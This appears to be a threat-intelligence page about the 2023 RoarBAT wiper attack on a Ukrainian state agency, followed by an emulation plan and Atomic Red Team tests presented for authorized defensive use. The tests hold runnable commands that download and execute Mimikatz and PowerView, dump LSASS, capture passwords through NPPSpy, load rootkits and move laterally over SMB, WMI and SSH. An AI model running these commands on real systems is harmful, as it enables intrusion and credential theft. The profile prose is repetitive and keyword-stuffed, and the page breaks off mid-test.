roarbat

Home/Threat Actor/RoarBAT

Threat Actor

roarbat · russia · active since 2023-04

RoarBAT (canonical CERT-UA + industry naming per April-May 2023 advisory with UAC-0165 moderate- confidence Sandworm attribution) is a Sandworm UAC- 0165-attributed WinRAR-based BAT script Windows wiper deployed April-May 2023 against an unnamed Ukrainian state agency, paired with Linux Bash + dd zero-byte companion wiper for multi-platform destruction.

Russia GRU Unit 74455 Sandworm Team moderate-confidence attribution via CERT-UA canonical advisory ("UAC-0165 with moderate confidence to the notorious Sandworm group aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear") + Ukrinform January 2023 UAC-0082 overlap evidence ("The method of implementation of the malicious plan, the IP addresses of the access subjects, as well as the fact of using a modified version of RoarBat testify to the similarity with the cyberattack on Ukrinform, information about which was published in the Telegram channel 'CyberArmyofRussia_Reborn' on January 17, 2023") + Bleeping Computer + SC Media + SOCRadar + Bitdefender + Govinfosecurity industry coverage; standalone cluster paralleling nikowiper + doublezero + awfulshred in v0.1.151 Russia-aligned 2022-2023 destructive wiper operations cell; operational target profile unnamed Ukrainian state agency primary target April-May 2023 per CERT-UA + critical systems via compromised VPN accounts without MFA + multi-platform Windows + Linux destruction.

operational attack architecture: (1) cluster-defining compromised VPN account without MFA initial access per CERT- UA + Bleeping Computer + SOCRadar ("Ukraine's critical systems have been accessed through compromised VPN accounts... The attackers accessed critical systems by exploiting VPN accounts lacking multi-factor authentication")

(2) cluster- defining WinRAR legitimate-archiver weaponization via -df command per The Hacker News + Bitdefender ("the use of a new batch script-based wiper malware called RoarBAT that performs a recursive search for files with a specific list of extensions and irrevocably deletes them using the legitimate WinRAR utility. This, in turn, was achieved by archiving the identified files using the '-df' command-line option and subsequently purging the created archives"), operationally innovative living-off-the-land tradecraft transforming defensive archiver into offensive destructive capability.

(3) signature 24+ file extensions comprehensive targeting per Bitdefender (.doc + .docx + .rtf + .txt + .xls + .xlsx + .ppt + .pptx + .vsd + .vsdx + .pdf + .png + .jpeg + .jpg + .zip + .rar + .7z + .mp4 + .sql + .php + .vbk + .vib + .vrb + .p7s + .sys + .dll + .exe + .bin + .dat) including documents + images + archives + backups (.vbk/.vib/.vrb Veeam backup signatures) + system files.

(4) cluster-defining Group Policy scheduled task deployment tradecraft per CERT-UA + SOCRadar consistent with Sandworm Group Policy Object deployment pattern (v0.1.130 CaddyWiper April 2022 + v0.1.136 SwiftSlicer January 2023); (5) cluster-defining Linux Bash + dd zero-byte companion wiper for multi-platform destruction ("The threat actors used a Bash script on Linux systems, which employed the 'dd' utility to overwrite target files with zero bytes, making file recovery unlikely or impossible")

(6) cluster-defining Ukrinform UAC-0082 - UAC-0165 Sandworm attribution chain with three converging indicators (IP addresses + implementation method + modified RoarBat version) tying RoarBAT April-May 2023 attack to January 2023 Ukrinform attack and through that to Sandworm operations.

cluster fills the April-May-2023-onward + WinRAR-weaponization + Group-Policy-scheduled-task + compromised-VPN-no- MFA-initial-access + multi-platform-Windows-Linux + Sandworm-UAC-0165-Ukrinform-overlap position in Russia-aligned 2022-2023 destructive wiper operations cell.

canonical illustration of WinRAR legitimate-program weaponization + GPO scheduled task Sandworm deployment pattern + compromised VPN no-MFA initial access + multi-platform Linux dd companion wiper + Ukrinform UAC-0082 - UAC-0165 Sandworm attribution chain cited in essentially all subsequent destructive cyberweapon industry analyses through 2023-2026 period.

russia confidence: high 13 aliases

Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

⬢

Profile

RoarBAT (canonical CERT-UA + industry naming per April-May 2023 advisory) is a Sandworm UAC-0165 moderate-confidence-attributed WinRAR-based BAT script Windows wiper deployed April-May 2023 against an unnamed Ukrainian state agency, paired with Linux Bash + dd zero-byte companion wiper for multi- platform destruction. Russia GRU Unit 74455 Sandworm Team moderate- confidence attribution via CERT-UA UAC-0165 canonical advisory + Ukrinform January 2023 UAC-0082 overlap evidence (IP addresses + implementation method + modified RoarBat version). Standalone cluster paralleling nikowiper + doublezero + awfulshred in v0.1.151 Russia-aligned 2022-2023 destructive wiper operations cell.

Operational target profile

Unnamed Ukrainian state agency primary target April-May 2023 per CERT-UA.
Critical systems via compromised VPN no-MFA.
Multi-platform Windows + Linux destruction Operational attack architecture: (1) Compromised VPN account without MFA initial access (cluster-defining): per CERT-UA + Bleeping Computer + SOCRadar (2) WinRAR weaponization via -df command (cluster-defining): legitimate archiver as file destruction vehicle, archive with -df flag auto-deletes originals, then del command removes archives (3) 24+ file extensions targeting (signature): comprehensive coverage documents + images + archives + backups + system files (4) Group Policy scheduled task deployment (cluster-defining): consistent with Sandworm pattern (v0.1.130 CaddyWiper April 2022 + v0.1.136 SwiftSlicer January 2023) (5) Linux Bash dd zero-byte companion wiper (cluster-defining): multi-platform destruction (6) Ukrinform UAC-0082 overlap (cluster-defining): three-indicator attribution chain (IP + method + version) tying RoarBAT to January 2023 Ukrinform via UAC-0082.
UAC-0165 Sandworm The cluster fills the April-May-2023-onward + WinRAR-weaponization + Group-Policy-scheduled-task + compromised-VPN-no-MFA-initial-access + Sandworm- UAC-0165-Ukrinform-overlap position in Russia- aligned 2022-2023 destructive wiper operations cell.

☉

Aliases

roarbatroar batroar_batroarbat_wiperroarbat windows bat script wiperroarbat winrar legitimate program weaponizedroarbat sandworm uac-0165 april may 2023roarbat group policy scheduled task deploymentroarbat winrar archiving -df command file deletionroarbat ukraine state agency cert-ua advisoryroarbat linux bash dd zero-byte companion wiperroarbat compromised vpn account no mfa initial accessroarbat modified roarbat ukrinform similarity ip overlap

⚡

Adversary Emulation Plan

13 steps

Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.

0 collection T1005 · Data from Local System darwin, linux

Parse SSH config

pip install stormssh && storm list

1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux

Dump history

find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null

2 discovery T1135 · Network Share Discovery windows

View admin shares

Get-SmbShare | ConvertTo-Json

3 discovery T1018 · Remote System Discovery darwin, linux, windows

Collect ARP details

arp -a

4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows

Run PowerKatz

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds

5 discovery T1018 · Remote System Discovery windows

Find Hostname

nbtstat -A #{remote.host.ip}

6 discovery T1018 · Remote System Discovery windows

Reverse nslookup IP

nslookup #{remote.host.ip}

7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows

Mount Share

net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}

8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows

Copy 54ndc47 (SMB)

$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";

9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux

Copy 54ndc47 (WinRM and SCP)

$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;

10 execution T1047 · Windows Management Instrumentation windows

Start 54ndc47 (WMI)

$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";

11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows

Start Agent (WinRM)

$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;

12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux

Start 54ndc47

scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

⌖

Notable Campaigns

2023-2026Continued Industry Reference Status (2023-2026)
2023RoarBAT Origin, Ukrainian State Agency Attack (April-May 2023)
2023RoarBAT Compromised VPN Account Without MFA Initial Access (Signature)
2023RoarBAT WinRAR Weaponization via -df Command Signature
2023RoarBAT 24+ File Extensions Targeting Signature
2023RoarBAT Group Policy Scheduled Task Deployment Signature
2023RoarBAT Linux Bash dd Zero-Byte Companion Wiper Signature
2023RoarBAT Ukrinform UAC-0082 Overlap + UAC-0165 Sandworm Moderate-Confidence Attribution

★

Attribution & Reporting

Attributed by

CERT-UA (canonical April-May 2023 advisory + UAC-0165 moderate-confidence Sandworm attribution + IP/implementation/version Ukrinform overlap evidence)The Hacker News (canonical May 8, 2023 CERT-UA SmokeLoader + RoarBAT coverage)Bleeping Computer (canonical May 4, 2023 Russian hackers WinRAR Ukraine state agency coverage)SC Media (canonical May 5, 2023 Ukrainian state network WinRAR Sandworm attack coverage)SOCRadar (canonical Sandworm Attackers Use WinRAR to Wipe Data from Government Devices analysis)Bitdefender HotForSecurity (canonical Russian Hackers Leverage WinRAR Unleash Wiper Malware analysis)Govinfosecurity (canonical WinRAR Weaponized for Attacks on Ukrainian Public Sector coverage)Cybersecurity-help.cz (canonical Russia-linked Sandworm continuing destructive attacks coverage)Computing.co.uk (canonical Russians Weaponise WinRAR coverage)CyberArmyofRussia_Reborn Telegram channel (referenced by CERT-UA as January 17, 2023 Ukrinform-publication signature)

Key reporting

reportCERT-UA: canonical April-May 2023 RoarBAT advisory + UAC-0165 moderate-confidence Sandworm attribution

reportThe Hacker News: CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine (May 8, 2023)

reportBleeping Computer: Russian hackers use WinRAR to wipe Ukraine state agency's data (May 4, 2023)

reportSC Media: Ukrainian state network data erased with WinRAR in Sandworm attack (May 5, 2023)

reportSOCRadar: Sandworm Attackers Use WinRAR to Wipe Data from Government Devices (canonical detailed analysis)

reportBitdefender HotForSecurity: Russian Hackers Leverage WinRAR to Unleash Wiper Malware on Ukrainian State Networks

reportGovinfosecurity: WinRAR Weaponized for Attacks on Ukrainian Public Sector

reportCybersecurity-help.cz: Russia-linked Sandworm continuing to target Ukraine with destructive attacks

reportComputing.co.uk: Russians weaponise WinRAR to attack Ukraine

9 source links

https://thehackernews.com/2023/05/cert-ua-warns-of-smokeloader-and.html

https://www.bleepingcomputer.com/news/security/russian-hackers-use-winrar-to-wipe-ukraine-state-agencys-data/

https://www.scmagazine.com/brief/threat-intelligence/ukrainian-state-network-data-erased-with-winrar-in-sandworm-attack

https://socradar.io/blog/sandworm-attackers-use-winrar-to-wipe-data-from-government-devices/

https://www.bitdefender.com/en-us/blog/hotforsecurity/russian-hackers-leverage-winrar-to-unleash-wiper-malware-on-ukrainian-state-networks

https://www.govinfosecurity.com/winrar-weaponized-for-attacks-on-ukrainian-public-sector-a-21965

https://www.cybersecurity-help.cz/blog/3267.html

https://www.computing.co.uk/news/4113361/russians-weaponise-winrar-attack-ukraine

https://socradar.io/sandworm-attackers-use-winrar-to-wipe-data-from-government-devices/

⬡

Operational

State sponsor

Russia GRU Unit 74455, Sandworm Team via CERT-UA UAC-0165 moderate-confidence attribution. Industry tracking per The Hacker News + Bleeping Computer + Bitdefender + SOCRadar + Govinfosecurity. CERT-UA canonical April-May 2023 advisory.

Attribution chain: (1) CERT-UA canonical April-May 2023 advisory + UAC-0165 moderate-confidence Sandworm attribution: per The Hacker News: "The agency further attributed UAC-0165 with moderate confidence to the notorious Sandworm group (aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear), which has a history of unleashing wiper attacks since the start of the Russo-Ukrainian war last year. The link to Sandworm stems from significant overlaps with another destructive attack that hit the Ukrainian state news agency Ukrinform in January 2023, which was tied to the adversarial collective." (2) CERT-UA Ukrinform-overlap-evidence: per CERT-UA: "The method of implementation of the malicious plan, the IP addresses of the access subjects, as well as the fact of using a modified version of RoarBat testify to the similarity with the cyberattack on Ukrinform, information about which was published in the Telegram channel 'CyberArmyofRussia_Reborn' on January 17, 2023." Three converging attribution indicators: implementation method + IP addresses + modified RoarBat version. (3) Bleeping Computer + SC Media canonical April- May 2023 industry coverage: per Bleeping Computer: "Russian advanced persistent threat group Sandworm has leveraged the WinRAR archiving program to destroy data on Windows and Linux machines in Ukraine's state networks, reports BleepingComputer.

Ukraine's critical systems have been accessed through compromised VPN accounts, with WinRAR then used to enable scripts for wiping machine-stored files, according to a new advisory from the Ukrainian Government Computer Emergency Response Team." (4) Bitdefender + SOCRadar canonical technical analysis: per Bitdefender: "The Russian hackers, believed to be part of the infamous Sandworm hacking group, used a BAT script called 'RoarBat' on Windows devices. The script searches for specific file types across the target's disks and directories." Per SOCRadar: "Sandworm (UAC-0165), a Russian hacking group, has been linked to an attack on Ukrainian state networks that involved wiping data from government devices using WinRAR." (5) Computing.co.uk + Govinfosecurity canonical coverage: per Computing.co.uk: "These include IP addresses associated with the group, the discovery of a modified version of RoarBat, and 'the method of implementation' used. The indicators share similarities with a previous attack in January targeting Ukrinform, the country's national news agency." Operational mission objective: Destructive wiper deployment against Ukrainian state networks April-May 2023.

Operationally aligned with Sandworm UAC-0165 tracking + Ukrinform January 2023 UAC-0082 cyber-kinetic tradition. Multi-platform Windows + Linux destruction with WinRAR/dd legitimate-program weaponization.

Operational target profile

Unnamed Ukrainian state agency primary target April-May 2023 per CERT-UA.
Critical systems accessed via compromised VPN accounts without MFA.
Windows + Linux + FreeBSD multi-platform destructive operations The cluster fills the April-May-2023-onward + WinRAR-weaponization + Group-Policy-scheduled-task + compromised-VPN-no-MFA-initial-access + Sandworm- UAC-0165-Ukrinform-overlap position in Russia- aligned 2022-2023 destructive wiper operations cell.

Motivations

russian_state_destructive_cyberweapon_operations, ukrainian_state_agency_destruction, sandworm_uac_0165_moderate_confidence_signature_capability, winrar_legitimate_program_weaponization_signature_tradecraft, group_policy_scheduled_task_deployment_signature_tradecraft, compromised_vpn_no_mfa_initial_access_signature_tradecraft, multi_platform_windows_linux_destruction_signature_capability

Sectors

ukrainian_state_government_agencies critical_infrastructure public_sector

Regions

ukraine

◈

Detection Blind Spots

60 techniques

Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.

Behavioral / log (Sigma)57/60 · 95%

Analytics (MITRE CAR)33/60 · 55%

Runtime / container (Falco)9/60 · 15%

File / malware (YARA)0/60 · 0%

Network (Suricata/Snort)17/60 · 28%

Vuln scan (Nuclei)0/60 · 0%

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.001 LSASS Memory · 14 tests

command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump

"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}

powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking

"#{dumpert_exe}"

command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"

manualwindowsDump LSASS.exe Memory using Windows Task Manager

command_promptelevatedwindowsOffline Credential Theft With Mimikatz

"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

command_promptelevatedwindowsLSASS read with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump

command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump

"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}

powershellelevatedwindowsPowershell Mimikatz

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5

$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id

powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs

#{xordump_exe} -out #{output_file} -x 0x41

powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe

if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."

command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1010 Application Window Discovery · 1 test

command_promptwindowsList Process Main Windows - C# .NET

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}

T1014 Rootkit · 4 tests

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo insmod #{rootkit_path}/#{rootkit_name}.ko

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo modprobe #{rootkit_name}

shelevatedlinuxdynamic-linker based rootkit (libprocesshider)

echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"

shelevatedlinuxLoadable Kernel Module based Rootkit (Diamorphine)

sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"

T1016 System Network Configuration Discovery · 9 tests

command_promptwindowsSystem Network Configuration Discovery on Windows

ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config

command_promptwindowsList Windows Firewall Rules

netsh advfirewall firewall show rule name=all

shmacos, linuxSystem Network Configuration Discovery

if [ "$(uname)" = 'FreeBSD' ]; then cmd="netstat -Sp tcp"; else cmd="netstat -ant"; fi;
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then $cmd | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;

command_promptwindowsSystem Network Configuration Discovery (TrickBot Style)

ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts

powershellwindowsList Open Egress Ports

$ports = Get-content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    $test = new-object system.Net.Sockets.TcpClient
    $wait = $test.beginConnect("allports.exposed", $port, $null, $null)
    $wait.asyncwaithandle.waitone(250, $false) | Out-Null
    $totalports++ | Out-Null
    if ($test.Connected) {
        $result = "$port open" 
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -append $file
        $totalopen++ | Out-Null
    }
    else {
        $result = "$port closed" 
        Write-Host -ForegroundColor Red $result
        $totalclosed++ | Out-Null
        $result | Out-File -Encoding ASCII -append $file
    }
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results

command_promptwindowsAdfind - Enumerate Active Directory Subnet Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}

command_promptwindowsQakbot Recon

"#{recon_commands}"

bashelevatedmacosList macOS Firewall Rules

sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate

command_promptwindowsDNS Server Discovery Using nslookup

nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%

T1018 Remote System Discovery · 22 tests

command_promptwindowsRemote System Discovery - net

net view /domain
net view

command_promptwindowsRemote System Discovery - net group Domain Computers

net group "Domain Computers" /domain

command_promptwindowsRemote System Discovery - nltest

nltest.exe /dclist:#{target_domain}

command_promptwindowsRemote System Discovery - ping sweep

for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i

command_promptwindowsRemote System Discovery - arp

arp -a

shlinux, macosRemote System Discovery - arp nix

arp -a | grep -v '^?'

shlinux, macosRemote System Discovery - sweep

for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done

powershellelevatedwindowsRemote System Discovery - nslookup

$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}

command_promptelevatedwindowsRemote System Discovery - adidnsdump

"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}

command_promptwindowsAdfind - Enumerate Active Directory Computer Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}

command_promptwindowsAdfind - Enumerate Active Directory Domain Controller Objects

"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist

shlinuxRemote System Discovery - ip neighbour

ip neighbour show

shlinuxRemote System Discovery - ip route

ip route show

shlinuxRemote System Discovery - netstat

netstat -r | grep default

shlinuxRemote System Discovery - ip tcp_metrics

ip tcp_metrics show |grep --invert-match "^127\."

powershellwindowsEnumerate domain computers within Active Directory using DirectorySearcher

$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}

powershellwindowsEnumerate Active Directory Computers with Get-AdComputer

Get-AdComputer -Filter *

powershellwindowsEnumerate Active Directory Computers with ADSISearcher

([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()

powershellwindowsGet-DomainController with PowerView

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose

powershellwindowsGet-WmiObject to Enumerate Domain Controllers

try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }

command_promptwindowsRemote System Discovery - net group Domain Controller

net group /domain "Domain controllers"

powershellwindowsEnumerate Remote Hosts with Netscan

cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'

T1021.001 Remote Desktop Protocol · 4 tests

powershellwindowsRDP to DomainController

$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
